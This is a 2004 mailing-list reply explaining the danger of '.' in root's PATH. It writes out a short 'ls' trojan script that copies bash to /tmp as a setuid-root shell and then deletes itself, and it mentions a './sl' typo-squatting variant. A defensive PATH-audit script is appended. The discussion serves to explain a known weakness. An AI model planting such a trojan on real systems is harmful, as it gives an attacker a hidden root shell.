On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said:

> I am looking for an old LS trojan, with trojan being a misnomer. Essentially,
> the scenario is that the admin (root) has a . (dot) in his path.

Geez. I don't have it, but it's easy enough to write.

% cat > ./ls
!!/bin/bash
/bin/cp /bin/bash /tmp/foobar
/bin/chmod 4755 /tmp/foobar
/bin/ls $*
/bin/rm -f $0
^D
% chmod +x ./ls

(Fix the shell magic and lack of > and 2> redirects yourself. Bonus points for
wrapping a check for $USER == root around the first 2 lines, and even more
for doing the *right* check ;)

And no, there's nothing in most "modern" unixoids that will "prevent" this
attack, other than not having '.' in the $PATH by default.

Incidentally, '.' at the front of $PATH is more dangerous for this, but I know
of at least one case where the sysadmin had '.' at the *end* and thought himself
safe - the attacker called it './sl' and waited for a typo (insider job, attacker
knew the admin was a poor typist ;)
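The mitigation named in the message above (no '.' in $PATH, whether at the front or at the end) can be checked mechanically. The following is an added example, not part of the original post: audit_path is a hypothetical helper name, the sample PATH at the bottom is constructed, and the check goes beyond the post by also flagging empty entries (which a POSIX shell treats as the current directory), other relative entries, and world-writable directories.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): audit a PATH string for entries
# that let a file in the current or a shared directory shadow a real command.
# audit_path is a hypothetical helper name chosen for this illustration.
# Output: one "position:entry:reason" line per finding; status 0 means clean.

audit_path() (
    rest="$1:"        # sentinel ':' so a trailing empty entry is not lost
    pos=0
    findings=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}      # text before the first ':'
        rest=${rest#*:}        # everything after it
        pos=$((pos + 1))
        reason=""
        case $entry in
            "") reason="empty entry (the shell treats it as the current directory)" ;;
            .)  reason="current directory" ;;
            /*) # Absolute path: flag it only if any user can create files there.
                if [ -n "$(find -H "$entry" -prune -type d -perm -0002 2>/dev/null)" ]; then
                    reason="world-writable directory"
                fi ;;
            *)  reason="relative directory" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%d:%s:%s\n' "$pos" "$entry" "$reason"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
)

# Constructed sample: '.' at the *end*, the case the sysadmin above thought safe.
audit_path "/usr/local/bin:/usr/bin:/bin:." || echo "PATH needs fixing"
```

Run it against root's real environment with audit_path "$PATH" from a root login shell, since that is the PATH that matters here.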